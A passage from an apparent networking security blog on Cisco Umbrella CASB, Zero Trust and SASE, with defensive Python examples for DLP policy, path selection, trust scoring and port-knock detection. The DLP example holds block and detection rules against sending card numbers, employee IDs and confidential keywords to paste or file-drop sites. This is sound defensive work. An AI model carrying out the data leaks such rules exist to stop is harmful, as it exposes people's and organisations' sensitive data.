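        findings = {k: v for k, v in findings.items() if v}
        if findings:
            return rule.action, rule.name, findings
    return "allow", None, {}


# Constructed identifiers and policy: block the one case that is clear-cut,
# monitor everything else while the rules are being tuned.
CARD = Identifier("credit_card", "credit_card")
KEYWORDS = Identifier("custom_keywords", "dictionary", ["project falcon", "confidential"])
EMPLOYEE_ID = Identifier("employee_id", "regex", r"\bEMP-\d{6}\b")
POLICY = [
    Rule("block-cards-to-unsanctioned", {"*"}, {"filedrop.example", "paste.example"}, [CARD], "block"),
    Rule("monitor-sensitive", {"*"}, {"*"}, [CARD, KEYWORDS, EMPLOYEE_ID], "monitor"),
]


def demo() -> list:
    uploads = [
        Upload("alice", {"finance"}, "filedrop.example", "Card 4111 1111 1111 1111 exp 12/27"),
        Upload("bob", {"engineering"}, "sharepoint.example", "Project Falcon design owned by EMP-123456"),
        Upload("carol", {"sales"}, "sharepoint.example", "Invoice 1234 5678 9012 3456 attached"),
    ]
    return [evaluate(POLICY, u) for u in uploads]


if __name__ == "__main__":
    for decision in demo():
        print(decision)
```

Promoting the monitor rule to block later is a one-word change on the rule, which is the point of starting in monitor-only mode: the findings you collect first tell you whether the identifiers are tuned well enough to block on.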

C) – Cisco Umbrella CASB starting points

Consider the following recommendations when starting a project that includes CASB functionality. First, discover sanctioned and unsanctioned cloud services, and then assess the cloud risk based on cloud service categories. This includes all cloud services and cloud plug-ins. Once this information has been gathered, it can be measured along with risk and compared to the organization’s risk tolerance.

Next, identify and protect sensitive information. Once you find all sensitive information in the cloud, you can classify it and then apply controls to control its movement, such as DLP. For example, additional protections can be used if sensitive data is moved from the cloud services to a local unmanaged laptop.

D) – SASE Detect and Mitigate Threats.

You can assess the user’s behavior and any deviations that may signal out-of-normal activity. The CASB is only one of many solutions that should be used here; more mature products with advanced detection, such as Splunk User Behavior Analytics (UBA), also apply. For example, once a significant deviation from the baseline is noticed, trust decreases, and you could implement step-down privileges or more drastic measures, thereby changing the level of access. In addition, it is helpful to track the movement of all data, detect and eliminate malware, and have an implementation strategy for remediation.

Summary: Cisco Umbrella SASE

In today’s digital landscape, businesses are rapidly adopting cloud technologies to drive innovation and enhance productivity. However, this shift towards the cloud also introduces new security challenges. Enter Cisco Umbrella CASB, a comprehensive cloud access security broker solution that empowers organizations to safely navigate their cloud journey while ensuring data protection and compliance.

Understanding Cisco Umbrella CASB

Cisco Umbrella CASB is a robust platform that provides visibility, control, and protection across all cloud applications and services utilized by an organization. It offers a centralized console to manage cloud access, enforce security policies, and detect potential threats. With its advanced capabilities, Cisco Umbrella CASB enables businesses to embrace the cloud securely.

Key Features and Benefits

a) Cloud Application Visibility: Cisco Umbrella CASB offers deep visibility into cloud applications and services being used within an organization. It provides valuable insights into user activities, data transfers, and potential risks, allowing administrators to make informed decisions.

b) Policy Enforcement: With granular policy controls, Cisco Umbrella CASB enables organizations to define and enforce security policies tailored to their specific needs. It ensures that data is accessed, shared, and stored within the cloud according to predefined guidelines, reducing the risk of data breaches or unauthorized access.

c) Threat Detection and Response: By leveraging advanced threat intelligence and machine learning, Cisco Umbrella CASB proactively identifies and mitigates potential threats within cloud environments. It alerts administrators about anomalous activities, suspicious behavior, or policy violations, enabling swift incident response.

Seamless Integration and Scalability

Cisco Umbrella CASB seamlessly integrates with existing security infrastructure, including firewalls, proxies, and endpoint security solutions. This integration allows businesses to leverage their existing investments while extending comprehensive cloud security capabilities. Additionally, the solution scales effortlessly as organizations expand their cloud footprint, ensuring continuous protection.

Real-World Use Cases

a) Data Loss Prevention: Cisco Umbrella CASB helps prevent sensitive data leakage by monitoring and controlling data transfers within cloud applications. It enables organizations to set up policies that restrict the sharing of confidential information or personally identifiable data, reducing the risk of data loss incidents.

b) Compliance and Governance: With its robust auditing and reporting capabilities, Cisco Umbrella CASB assists organizations in meeting regulatory compliance requirements. It provides detailed logs and insights into user activities, ensuring transparency and accountability in cloud usage.

Conclusion

Cisco Umbrella CASB is a game-changer in the realm of cloud security. Its comprehensive feature set, seamless integration, and scalability make it an invaluable asset for organizations aiming to secure their cloud journey. By harnessing the power of Cisco Umbrella CASB, businesses can unlock the true potential of the cloud while safeguarding their critical assets and maintaining compliance.


Zero Trust SASE

In today's digital age, where remote work and cloud-based applications are becoming the norm, traditional network security measures are no longer sufficient to protect sensitive data. Enter Zero Trust Secure Access Service Edge (SASE), a revolutionary approach that combines the principles of Zero Trust security with the flexibility and scalability of cloud-based architectures. In this blog post, we will delve into the concept of Zero Trust SASE and explore its benefits and implications for the future of network security.

Zero Trust is a security model that operates on "never trust, always verify." It assumes that no user or device should be granted automatic trust within a network, whether inside or outside the perimeter. Instead, every user, device, and application must be continuously authenticated and authorized based on various contextual factors, such as user behavior, device health, and location.

SASE is a comprehensive security framework that combines networking and security capabilities into a single cloud-based service. It aims to simplify and unify network security by providing secure access to applications and data, regardless of the user's location or device.

SASE integrates various security functions, such as secure web gateways, cloud access security brokers, and data loss prevention, into a single service, reducing complexity and improving overall security posture.

Highlights: Zero Trust SASE

Innovative Security Framework

Zero Trust SASE is an innovative security framework that combines Zero Trust principles with Secure Access Service Edge (SASE) architecture. It emphasizes continuous verification and validation of every user, device, and network resource attempting to access an organization’s network, regardless of location. By adopting a zero-trust approach, organizations can enhance security by eliminating the assumption of trust and implementing stricter access controls.

1. Note: Zero Trust SASE is built upon several key components to create a robust and comprehensive security framework. These components include identity and access management, multi-factor authentication, network segmentation, encryption, continuous monitoring, and threat intelligence integration. Each element is crucial in strengthening network security and protecting against evolving cyber threats.

2. Note: Both SASE and ZTNA are essential components of modern security architecture, but they are two different things. SASE provides a comprehensive, multi-faceted security framework, while ZTNA is a narrower model focused on limiting access to resources; ZTNA is one component within SASE.

**Challenge: The Lag in Security** 

Today’s digital transformation and strategy initiatives require speed and agility in IT. However, there is a lag, and that lag is in security. Security either holds these initiatives back or fails to match the fluidity that agility demands. As a result, the organization’s security posture decreases, and that is a risk that must be managed. There is plenty to deal with: the rise in phishing attacks, mobile malware, rogue public Wi-Fi networks, malicious apps, and data leaks. Therefore, we have new requirements that SASE can help with.

Zero Trust Security

Zero Trust Security is a paradigm shift from the traditional perimeter-based security model. It operates on the principle of “never trust, always verify.” Unlike the old approach, where users and devices were granted broad access once inside the network, Zero Trust Security treats every user, device, and network segment as potentially untrusted. This enhanced approach minimizes the risk of unauthorized access and lateral movement within the network.

Continuous Verification & Strict Access Control

Zero Trust is a security model that operates on the principle of never trusting any network or user by default. It emphasizes continuous verification and strict access control to mitigate potential threats. With Zero Trust, organizations adopt a granular approach to security, ensuring that every user, device, and application is authenticated and authorized before accessing any resources.

Challenge: Large Segments with VLANs

Example Technology: Network Endpoint Groups

**Understanding Micro-segmentation**

Microsegmentation is a critical strategy in modern network management, providing a method to improve security by dividing a network into smaller, isolated segments. This approach ensures that any potential security breaches are contained and do not spread across the network. In the context of Google Cloud, NEGs can be effectively used to implement microsegmentation. By creating smaller, controlled segments, you can enforce security policies more rigorously, reducing the risk of unauthorized access and enhancing the overall security posture of your applications.



**The SASE Concept**

Gartner coined the SASE concept after seeing a pattern emerge in cloud and SD-WAN projects where full security integration was needed. We now refer to SASE as a framework and a security best practice. SASE leverages multiple security services into a framework approach.

The idea of SASE was not far from what we already did, which was integrating numerous security solutions into a stack that ensured a comprehensive, layered, secure access solution. By calling it a SASE framework, the approach to a complete solution somehow felt more focused than what the industry recognized as a best security practice.

The security infrastructure and its decisions must become continuous and adaptive, rather than the static ones that formed the basis of traditional security methods. Consequently, we must enable real-time decisions that balance risk, trust, and opportunity. As a result, security has moved beyond a simple access control list (ACL) and zone-based segmentation built on VLANs. In reality, no single network point acts as an anchor for security any more.

Example Technology: IPv6 Access Lists 

Many current network security designs and technologies were not designed to handle all the traffic and security threats we face today. This has forced many to adopt multiple point products to address the different requirements. Remember that for every point product, there is an architecture to deploy, a set of policies to configure, and a pile of logs to analyze. I find correlating logs across multiple point products used in different domains hard.

For example, a diverse team may operate the secure web gateways (SWG) to that of the virtual private network (VPN) appliances. It could be the case that these teams work in silos and are in different locations.

Zero Trust SASE requirements:

  1. Information hiding: SASE requires clients to be authenticated and authorized before accessing protected assets, regardless of whether the connection is inside or outside the network perimeter.
  2. Mutually encrypted connections: SASE uses standard TLS for encryption and cryptographic authentication. Plain TLS authenticates only the server; mutual TLS (mTLS) goes one step further and authenticates the client as well.
  3. Need-to-know access model: SASE employs a need-to-know access model. As a result, SASE permits the requesting client to view only the resources appropriate to the assigned policy.
  4. Dynamic access control: SASE deploys a dynamic firewall that starts with one rule: deny all. Then, each authorized communication is dynamically inserted into the firewall, providing an active firewall security policy instead of a static configuration.
  5. Identity-driven access control: SASE provides adaptive, identity-aware, precise access for those seeking finer access and session control over applications on-premises and in the cloud.

Starting Zero Trust

Endpoint Security 

Understanding ARP (Address Resolution Protocol)

ARP is a vital network communication protocol that maps an IP address to a physical MAC address. By maintaining an ARP table, endpoints can efficiently communicate within a network. 

Routes and gateways act as the pathways for data transmission between networks. Safeguarding these routes is crucial to network integrity. We will discuss the significance of securing routing protocols such as OSPF and BGP, and how that contributes to endpoint security. 

Netstat, short for Network Statistics, is a powerful command-line tool providing detailed information about network connections and statistics. This section will highlight the importance of using netstat for monitoring endpoint security. From identifying active connections to detecting suspicious activities, netstat empowers administrators to protect their networks proactively.

Understanding SELinux

SELinux is a robust security framework built into the Linux kernel. It provides fine-grained access control policies and mandatory access controls (MAC) to enforce system-wide security policies. Unlike traditional Linux discretionary access controls (DAC), SELinux operates on the principle of least privilege, ensuring that only authorized actions are allowed.

Organizations can establish a robust security posture for their endpoints by combining SELinux with zero trust principles. SELinux provides granular control over system resources, enabling administrators to define strict policies based on user roles, processes, and system components. This ensures that even if an endpoint is compromised, the attacker’s lateral movement and potential damage are significantly limited.

### Understanding Authentication in Vault

Authentication is the process of verifying the identity of a user or system. In Vault, this is achieved through various authentication methods such as tokens, AppRole, LDAP, GitHub, and more. Each method serves different use cases, allowing flexibility and scalability in managing access. Vault ensures that only authenticated users can access sensitive data, thus mitigating the risk of unauthorized access.

### The Role of Authorization

While authentication verifies identity, authorization determines what authenticated users can do. Vault uses policies to define the actions that users and applications can perform. These policies are written in HashiCorp Configuration Language (HCL) or JSON, and they provide a fine-grained control over access to secrets. By segregating duties and defining clear access levels, Vault helps prevent privilege escalation and minimizes the risk of data exposure.

### Managing Identity with Vault

Vault’s identity management capabilities allow organizations to unify identities across various platforms. By integrating with identity providers and managing roles and entities, Vault simplifies user management and enhances security. This integration ensures that user credentials are consistently verified and that access rights are updated as roles change, reducing the risk of stale credentials being exploited.


Use Case: WAN Edge Performance Routing

SASE & Performance-Based Routing

Performance-based routing is a dynamic routing technique that selects the best path for network traffic based on real-time performance metrics. Traditional routing protocols often follow static routes, leading to suboptimal network performance. However, performance-based routing leverages latency, packet loss, and bandwidth availability metrics to make informed routing decisions. By continuously evaluating these metrics, networks can adapt and reroute traffic to ensure optimal performance.
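The selection logic described above, as an added example that is not code from the page or from any SD-WAN product: each candidate path is scored against a per-traffic-class SLA, paths that breach a hard limit are dropped outright, and a hysteresis margin keeps the current path unless a rival is clearly better, so noisy probe results do not cause flapping. The path names, SLA limits, weights and probe values are constructed for illustration.

```python
"""Performance-based path selection for a WAN edge (added example)."""
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass
class PathMetrics:
    """One probe result for a candidate WAN path (constructed values)."""
    name: str
    latency_ms: float
    loss_pct: float
    jitter_ms: float
    bandwidth_mbps: float


# Constructed SLA for a voice/video class: a path violating any hard limit is
# ineligible regardless of how well it scores elsewhere.
SLA = {"latency_ms": 150.0, "loss_pct": 2.0, "jitter_ms": 30.0}
WEIGHTS = {"latency_ms": 0.4, "loss_pct": 0.4, "jitter_ms": 0.2}
HYSTERESIS = 0.10    # a new path must beat the current one by 10% to switch


def meets_sla(p: PathMetrics) -> bool:
    return (p.latency_ms <= SLA["latency_ms"]
            and p.loss_pct <= SLA["loss_pct"]
            and p.jitter_ms <= SLA["jitter_ms"])


def score(p: PathMetrics) -> float:
    """Lower is better: each metric is normalised against its SLA limit and
    weighted, so a path at exactly the limits on all metrics scores 1.0."""
    return (WEIGHTS["latency_ms"] * p.latency_ms / SLA["latency_ms"]
            + WEIGHTS["loss_pct"] * p.loss_pct / SLA["loss_pct"]
            + WEIGHTS["jitter_ms"] * p.jitter_ms / SLA["jitter_ms"])


def select_path(paths: Iterable[PathMetrics], current: Optional[str] = None,
                min_bw_mbps: float = 0.0) -> Optional[str]:
    """Pick the best SLA-compliant path with enough bandwidth. The current
    path is kept unless another beats it by the hysteresis margin."""
    eligible = [p for p in paths
                if meets_sla(p) and p.bandwidth_mbps >= min_bw_mbps]
    if not eligible:
        return None                      # nothing meets the SLA: caller decides
    best = min(eligible, key=score)
    cur = next((p for p in eligible if p.name == current), None)
    if cur is not None and score(best) > score(cur) * (1 - HYSTERESIS):
        return cur.name                  # improvement too small: stay put
    return best.name


if __name__ == "__main__":
    # Constructed probe samples from three uplinks.
    probes = [PathMetrics("mpls", 40, 0.1, 5, 50),
              PathMetrics("inet1", 30, 0.5, 8, 500),
              PathMetrics("lte", 90, 3.0, 20, 100)]
    print(select_path(probes, current="inet1"))
```

Returning `None` when no path meets the SLA is deliberate: the caller has to choose between the least-bad path and a policy action, and hiding that inside the selector would mask an outage.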

Google Cloud & IAP

**Understanding the Basics of IAP**

At its core, Identity-Aware Proxy is a security service that acts as a gatekeeper for applications and resources. It ensures that only authenticated and authorized users can access specific web applications hosted on cloud platforms. Unlike traditional security models that rely on network-level access controls, IAP takes a user-centric approach, verifying identity and context before granting access. This method not only strengthens security but also simplifies access management across distributed environments.

**The Role of IAP in Google Cloud**

Google Cloud offers a versatile and integrated approach to using IAP, making it an attractive option for organizations leveraging cloud services. With Google Cloud’s IAP, businesses can secure their web applications and VMs without the need for traditional VPNs or complex network configurations. This section will delve into how Google Cloud implements IAP, highlighting its seamless integration with other Google Cloud services and the ease with which it can be deployed. By utilizing Google Cloud’s IAP, businesses can streamline their security operations and focus on delivering value to their customers.

**Benefits of Using Identity-Aware Proxy**

The advantages of implementing IAP are manifold. Firstly, it enhances security by enforcing granular access controls based on user identity and context. This reduces the risk of unauthorized access and potential data breaches. Secondly, IAP simplifies the user experience by enabling single sign-on (SSO) capabilities, allowing users to access multiple applications with a single set of credentials. Additionally, IAP’s integration with existing identity providers ensures that businesses can maintain a consistent security policy across their entire IT ecosystem.


Related: For pre-information, you may find the following helpful:

  1. SD-WAN SASE
  2. SASE Model
  3. SASE Solution
  4. Cisco Secure Firewall
  5. SASE Definition

Zero Trust SASE

Many challenges to existing networks and infrastructure create big security holes and decrease security posture. In reality, several IT components give an entity more access than it requires. We have considerable security flaws from using IP addresses and static locations as a security anchor; the virtual private network (VPN) and demilitarized zone (DMZ) architectures used to establish access are often configured to allow excessive implicit trust.  

## Challenge 1: The issue with a DMZ

The DMZ is the neutral network between the Internet and your organization’s private network. It’s protected by a front-end firewall that limits Internet traffic to specific systems within its zone. The DMZ can have a significant impact on security if not appropriately protected. Remote access technologies such as VPN or RDP, often located in the DMZ, have become common targets of cyberattacks. One of the main issues I see with the DMZ is that the bad actors know it’s there. It may be secured, but it’s visible.

## Challenge 2: The issue with the VPN

In basic terms, a VPN provides an encrypted tunnel to a VPN server and hides the client’s IP address. However, the VPN does not secure users once they land on a network segment, and it is based on coarse-grained access control: the user gets access to entire network segments and subnets. Traditionally, once you are on a segment, there is no intra-segment filtering. That means all users in that segment are assumed to need the same security level and access to the same systems, which is not always the case. 


## Challenge 3: permissive network access

VPNs generally provide broad, overly permissive network access with only basic access-control limits based on subnet ranges. So the traditional VPN provides overly permissive access, with security based on IP subnets. Note: the issue with VLAN-based segmentation is large broadcast domains with free-for-all access inside them. This represents a larger attack surface in which lateral movement can take place. The typical case is a flat VLAN-based network running Spanning Tree Protocol (STP).

## Challenge 4: Security-based on trust

Much of non-zero-trust security architecture is based on trust, which bad actors abuse. By contrast, a SASE overview includes zero trust networking and remote access as components that adaptively grant only the trust required at the time and nothing more. It is like providing narrow segmentation based on many contextual parameters, continuously assessed for risk, to ensure that users are who they claim to be and that entities, whether internal or external to the network, are doing what they are supposed to do.

**Removes excessive trust**

A core feature of SASE and Zero Trust is that it removes the excessive trust once required to allow entities to connect and collaborate. Within a zero-trust environment, the implicit trust of traditional networks is replaced with explicit identity-based trust and a default of denial. With an identity-based trust solution, we no longer look only at IP addresses to determine trust levels. After all, an IP address is just bits on the wire; treating private addresses as secure and public ones as less trustworthy is the assumption where many of our problems started.

## Challenge 5: IP for Location and Identity 

To improve your security posture, it would be best to stop relying primarily on IP addresses and network locations as a proxy for trust. We have been doing this for decades. There is minimal context in placing a policy with legacy constructs. To determine the trust of a requesting party, we need to examine multiple contextual aspects, not just IP addresses.

And the contextual aspects are continuously assessed for security posture. This is a much better way to manage risk and allows you to look at the entire picture before deciding to enter the network or access a resource.
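One way to wire up the continuous, contextual evaluation described here, combined with the baseline-deviation and step-down-privilege idea from the behavior-analytics discussion earlier on this page. This is an added example, not code from the page or from any CASB or UBA product: a per-user baseline, a z-score on the current request, device and location context, and a trust score that steps privileges down rather than flipping a single allow/deny switch. The user, baseline history, weights and thresholds are constructed for illustration.

```python
"""Adaptive trust scoring from a behavioural baseline plus request context
(added example; all names, thresholds and samples are constructed)."""
from dataclasses import dataclass
from statistics import mean, pstdev
from typing import Dict, List


@dataclass
class Context:
    """Signals available at the time of a request."""
    user: str
    bytes_out: int          # data moved in this session
    login_hour: int         # 0-23, local time of the request
    device_managed: bool    # e.g. MDM-enrolled, disk encrypted, EDR running
    known_location: bool    # source network seen for this user before
    mfa: bool               # strong second factor presented


# Constructed per-user history: daily bytes_out and login hours.
BASELINE: Dict[str, Dict[str, List[float]]] = {
    "alice": {"bytes_out": [20_000, 25_000, 18_000, 22_000, 24_000],
              "login_hours": [8, 9, 9, 10, 8]},
}


def zscore(value: float, history: List[float]) -> float:
    """Standard deviations between `value` and the user's own history."""
    sd = pstdev(history) or 1.0     # flat history: avoid division by zero
    return (value - mean(history)) / sd


def trust_score(ctx: Context) -> int:
    """Score 0-100. Start from full trust and subtract per risk signal."""
    base = BASELINE[ctx.user]
    score = 100
    # Behavioural deviation: data movement far outside the baseline.
    if abs(zscore(ctx.bytes_out, base["bytes_out"])) > 3:
        score -= 40
    # Unusual time of day for this particular user.
    if abs(zscore(ctx.login_hour, base["login_hours"])) > 3:
        score -= 15
    # Device and network context.
    if not ctx.device_managed:
        score -= 30
    if not ctx.known_location:
        score -= 15
    if not ctx.mfa:
        score -= 20
    return max(score, 0)


def access_decision(ctx: Context) -> str:
    """Map the score to a privilege level. Falling trust steps privileges
    down (read-only, re-authenticate) before reaching an outright deny."""
    score = trust_score(ctx)
    if score >= 80:
        return "full"
    if score >= 50:
        return "read-only"          # step-down privileges
    if score >= 30:
        return "reauthenticate"     # force a fresh MFA challenge
    return "deny"


if __name__ == "__main__":
    # Same managed device and known location, but 100x the usual data volume.
    print(access_decision(Context("alice", 2_000_000, 9, True, True, True)))
```

The point of the four-way outcome is that the same score drives session control as well as admission: a session that was admitted with full access can be re-evaluated on every request and quietly demoted to read-only when the data volume climbs, without waiting for a hard block.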

Example: Firewall Tagging


1) SASE: First attempt to 

Organizations have adopted different security technologies to combat these changes and include them in their security stack. Many of these security technologies are cloud-based services, including the cloud-based secure web gateway (SWG), the content delivery network (CDN), and the web application firewall (WAF).

A secure web gateway (SWG) protects users from web-based threats and applies and enforces acceptable corporate use policies. A content delivery network (CDN) is a geographically distributed group of servers that works together to deliver Internet content quickly. A WAF, or web application firewall, helps protect web applications by filtering and monitoring HTTP traffic between them and the Internet.

The data center is the center of the universe.

However, even with these welcomed additions to security, the general trend was that the data center is still the center of most enterprise networks and network security architectures. Let’s face it: These designs are becoming ineffective and cumbersome with the rise of cloud and mobile technology. Traffic patterns have changed considerably, and so has the application logic.

2) SASE: Second attempt to

The next attempt is the converged, cloud-delivered secure access service edge (SASE), built for this shift in the landscape. The SASE architecture relies on multiple contextual aspects to establish and adapt trust for application-level access. It does not concern itself with large VLANs and broad network access, nor does it assume that the data center is the center of the universe. Instead, the SASE architecture is usually based on points of presence (PoPs), where each PoP acts as the center of its own universe.

The SASE definition and its components describe a transformational architecture that can combat many of the challenges discussed. A SASE solution converges networking and security services into one unified, cloud-delivered solution that includes the following core capabilities of SASE.

From the network side of things: SASE in networking:

    1. Software-defined wide area network (SD-WAN)
    2. Virtual private network (VPN)
    3. Zero trust network (ZTN)
    4. Quality of service (QoS)
    5. Software-defined perimeter (SDP)

Example SDP Technology: VPC Service Controls


From the security side of things, SASE capabilities in security:

    1. Firewall as a service (FWaaS)
    2. Domain Name System (DNS) security
    3. Threat prevention
    4. Secure web gateways
    5. Data loss prevention (DLP)
    6. Cloud access security broker (CASB)

Example Technology: The Web Security Scanner


SASE changes the focal point to the identity of the user and device. In traditional enterprise networks and security architectures, the on-premises data center is considered the center of the universe, and the internal data center is the focal point for access. SASE changes that to match today’s environment and moves the perimeter to the actual user and device or, in some SASE designs, to the PoP. 

Example Product: Cisco Meraki

### What is Cisco Meraki?

Cisco Meraki is a suite of cloud-managed IT solutions that include wireless, switching, security, EMM (Enterprise Mobility Management), and security cameras, all centrally managed from the web. The Meraki dashboard provides powerful and intuitive tools to manage your entire network from a single pane of glass. This holistic approach ensures that businesses can maintain robust security protocols without compromising on ease of management.

### Key Features of Cisco Meraki

#### Cloud-Based Management

One of the standout features of Cisco Meraki is its cloud-based management. This allows for real-time monitoring, configuration, and troubleshooting from anywhere in the world. With automatic updates and seamless scalability, businesses can ensure their network is always up-to-date and secure.

#### Advanced Security Features

Cisco Meraki offers a range of advanced security features designed to protect your network from various threats. These include intrusion detection and prevention systems (IDS/IPS), advanced malware protection (AMP), and content filtering. By leveraging these tools, businesses can safeguard their data and maintain the integrity of their network.

#### Simplified Deployment

Deploying a traditional network can be a complex and time-consuming task. Cisco Meraki simplifies this process with zero-touch provisioning, which allows devices to be pre-configured and managed remotely. This reduces the need for on-site technical expertise and accelerates the deployment process.

### Benefits of Using Cisco Meraki for Network Security

#### Centralized Control

The centralized control offered by the Meraki dashboard enables IT teams to manage multiple sites from a single interface. This not only streamlines operations but also ensures consistent security policies across all locations.

#### Scalability

As businesses grow, their network needs evolve. Cisco Meraki’s scalable solutions allow for easy expansion without the need for significant infrastructure changes. This flexibility ensures that businesses can adapt to changing demands without compromising on security.

#### Cost Efficiency

By reducing the need for on-site hardware and simplifying management, Cisco Meraki can lead to significant cost savings. Additionally, the reduced need for technical expertise can lower operational costs, making it an attractive option for businesses looking to optimize their IT budget.

VPN Security Scenario 

  • Challenge: Traditional remote access VPNs

Remote access VPNs are primarily built to allow users outside the perimeter firewall to access resources inside the perimeter firewall. As a result, they often follow a hub-and-spoke architecture, with users connected by tunnels of various lengths depending on their distance from the data center. Traditional VPNs introduce a lot of complexity. For example, what do you do if you have multiple sites where users need to access applications? In this scenario, the cost of management would be high. 

  • Challenge: Tunnel based on IP

What’s happening here is that the tunnel creates an extension between the client device and the application location. The tunnel is based on the IP addresses of the client device and the remote application. Once there is IP connectivity between the client and the application, the network where the application is located is extended to the client.

However, the client might be sitting in a hotel room or at home. Such locations may not be sufficiently protected and should be considered insecure. The traditional VPN has many issues to deal with: it is user-initiated, and policy often permits split-tunnel VPNs, so Internet and cloud traffic bypass inspection.

SASE: A zero-trust VPN solution

A SASE solution encompasses VPN services and adds the ability to route traffic through cloud-based infrastructure. With SASE, the client connects to the SASE PoP, which carries out security checks and forwards the request to the application. A SASE design still lets clients reach the application, but they can reach only that specific application and nothing more, rather like a stripped-down VLAN, an approach known as micro-segmentation.

Restricting Lateral Movements

Clients must pass security controls, and there is no broad network access that would be susceptible to lateral movement. Access control is based on an allowlist rather than the traditional blocklist rule. Also, other variables present in the request context are used as the client identifier instead of IP addresses. As a result, the application is now the access path, not the network.

Simplified Management & Policy Control

So, no matter what type of VPN services you use, the SASE provides a unified cloud to connect to instead of backhauling to a VPN gateway—simplifying management and policy control. Well-established technologies such as VPN, secure web gateway, and firewall are being reviewed and reassessed in Zero Trust remote access solutions as organizations revisit approaches that have been in place for over a decade. 

A recommendation: SASE and SD-WAN

The value of SD-WAN is high. However, it also brings many challenges, including new security risks. In some of my consultancies, I have seen unreliable performance and increased complexity due to the need for multiple overlays. These overlays also need to terminate somewhere, and that will be at a hub site. However, when combined with SASE, the SD-WAN edge devices can be connected to a cloud-based infrastructure rather than to physical SD-WAN hubs. This brings the value of interconnectivity between branch sites without the complexity of deploying or managing physical hub sites.

Zero Trust SASE: Vendor considerations

SASE features converge various individual components into one connected, cloud-delivered service, making it easy to control policies and behaviors. The SASE architecture is often based on a PoP design. When examining the SASE vendor, the vendor’s PoP layout should be geographically diverse, with worldwide entry and exit points. 

Also, considerations should be made regarding the vendor’s edge/physical infrastructure providers or colocation facilities. We can change your security posture, but we can’t change the speed of light and the laws of physics.

Consider how the SASE vendor routes traffic in its PoP fabric. Route optimization should be performed at each PoP. Some route optimizations are for high availability, while others are for performance. Does the vendor offer cold-potato or hot-potato routing? Cold-potato routing means bringing the end user’s traffic into the provider’s network as soon as possible and keeping it there for as long as possible; with hot-potato routing, the provider hands traffic off early, so it traverses more of the public Internet.

The following is a list of considerations to review when discussing SASE with your preferred cybersecurity vendor:

A. Zero Trust SASE requirements: Information hiding:

Secure access service requires clients to be authenticated and authorized before accessing protected assets, regardless of whether the connection is inside or outside the network perimeter. Then, real-time encrypted connections are created between the requesting client and the protected asset. As a result, all SASE-protected servers and services are hidden from all unauthorized network queries and scan attempts.

You can’t attack what you can’t see.

Network security started by limiting visibility: you cannot attack what you cannot see. Public and private IP address ranges were carved into separate networks, and treating that split as a security boundary was one of our biggest mistakes, because an IP address is just bits whether it is deemed public or private. If a host with a public address wanted to communicate with a host with a private address, it had to go through a network address translation (NAT) device and be permitted by policy.

Understanding Port Knocking

Port knocking is a technique that enables controlled access to network services. Traditionally, a listening service’s port is reachable by anyone who can route to the host, leaving the system exposed to unauthorized connection attempts. With port knocking, access to a specific port is granted only after a predefined sequence of connection attempts is made to other closed ports. This sequence acts as a virtual “knock” on the door, allowing authorized users to gain access while keeping opportunistic scanners out.

To fully comprehend port knocking, let’s explore its inner mechanics. When users wish to access a specific service, they must first send connection attempts to a series of closed ports in a particular order. This sequence acts as a secret handshake, notifying the server that the user is authorized. Once the correct sequence is detected, the server dynamically opens the desired port, granting access to the requested service. It’s like having a hidden key that unlocks the door to a secure sanctuary.
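The mechanics just described, as an added example that is not code from the page or from any knock daemon such as knockd: a small daemon consumes the firewall’s dropped-packet events, tracks each source’s progress through the knock sequence with a completion deadline, resets on any out-of-order port, and opens the protected port for that source only, for a limited time. The log-line format, knock sequence, ports and client addresses are constructed for illustration; a real deployment would read the firewall’s own log and insert the allow rule with the firewall’s tooling.

```python
"""Port-knock sequence detector over firewall drop-log lines (added example)."""
import re
from typing import Dict, Iterable, Tuple

# Constructed knock sequence and the service it unlocks.
KNOCK_SEQUENCE = [7000, 8000, 9000]
PROTECTED_PORT = 22
KNOCK_WINDOW = 10.0   # seconds allowed to complete the whole sequence
OPEN_FOR = 30.0       # seconds the port stays open for that client

# Constructed log line format: "<epoch> DROP SRC=<ip> DPT=<port>"
LOG_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?) DROP SRC=(?P<src>[\d.]+) DPT=(?P<dpt>\d+)$")


class KnockDaemon:
    def __init__(self) -> None:
        self._progress: Dict[str, Tuple[int, float]] = {}  # src -> (next_index, first_knock_ts)
        self._open: Dict[str, float] = {}                   # src -> expiry timestamp

    def observe(self, ts: float, src: str, dport: int) -> None:
        """Feed one dropped-packet event. A correct next knock advances the
        client; a wrong port or an expired window resets the sequence."""
        idx, started = self._progress.get(src, (0, ts))
        if ts - started > KNOCK_WINDOW:
            idx, started = 0, ts                 # too slow: start over
        if dport == KNOCK_SEQUENCE[idx]:
            idx += 1
            if idx == len(KNOCK_SEQUENCE):
                self._open[src] = ts + OPEN_FOR  # full sequence: open the port
                self._progress.pop(src, None)
                return
            self._progress[src] = (idx, started)
        else:
            # Any wrong port resets progress, so a scanner walking every port
            # in order never gets past the first knock.
            self._progress.pop(src, None)
            if dport == KNOCK_SEQUENCE[0]:
                self._progress[src] = (1, ts)

    def is_open(self, src: str, dport: int, now: float) -> bool:
        """Firewall decision for a new connection attempt: default deny."""
        if dport != PROTECTED_PORT:
            return False
        expiry = self._open.get(src)
        if expiry is None:
            return False
        if now > expiry:
            del self._open[src]                  # lease expired: close again
            return False
        return True

    def feed_log(self, lines: Iterable[str]) -> None:
        for line in lines:
            m = LOG_RE.match(line.strip())
            if m:
                self.observe(float(m["ts"]), m["src"], int(m["dpt"]))


# Constructed sample log: 203.0.113.5 knocks correctly; 198.51.100.9 scans.
SAMPLE_LOG = """
1000.0 DROP SRC=203.0.113.5 DPT=7000
1001.0 DROP SRC=203.0.113.5 DPT=8000
1002.0 DROP SRC=203.0.113.5 DPT=9000
1000.0 DROP SRC=198.51.100.9 DPT=7000
1000.5 DROP SRC=198.51.100.9 DPT=7001
1001.0 DROP SRC=198.51.100.9 DPT=8000
1001.5 DROP SRC=198.51.100.9 DPT=9000
""".strip().splitlines()


def run_sample() -> KnockDaemon:
    daemon = KnockDaemon()
    daemon.feed_log(SAMPLE_LOG)
    return daemon


if __name__ == "__main__":
    d = run_sample()
    print(d.is_open("203.0.113.5", 22, 1005.0), d.is_open("198.51.100.9", 22, 1005.0))
```

Note the caveat a practitioner would raise before relying on this: the knock sequence travels in the clear, so anyone sniffing the path can replay it, and the server never learns who knocked. That is the gap single-packet authorization closes.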

Security based on the visibility

